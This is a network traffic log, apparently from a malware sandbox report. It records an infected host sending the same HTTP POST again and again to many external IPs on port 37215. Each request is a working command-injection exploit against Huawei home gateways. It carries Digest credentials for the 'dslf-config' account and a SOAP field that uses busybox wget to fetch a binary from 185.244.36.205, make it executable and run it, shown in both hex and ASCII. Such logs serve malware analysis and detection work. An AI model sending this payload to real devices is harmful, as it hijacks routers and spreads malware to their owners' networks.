                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2046192.168.2.1543478102.27.204.8137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103028059 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2047192.168.2.153431694.224.195.16837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103070974 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2048192.168.2.1536948181.32.42.19937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103074074 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2049192.168.2.154105041.146.158.6237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103075981 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2050192.168.2.1552576138.247.63.7837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103084087 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2051192.168.2.153282045.51.87.17837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103131056 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2052192.168.2.1559482197.197.210.3837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103205919 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2053192.168.2.1552648138.238.106.19437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103225946 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2054192.168.2.1543702186.246.152.5337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103266001 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2055192.168.2.1557680156.24.212.18237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.103266001 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
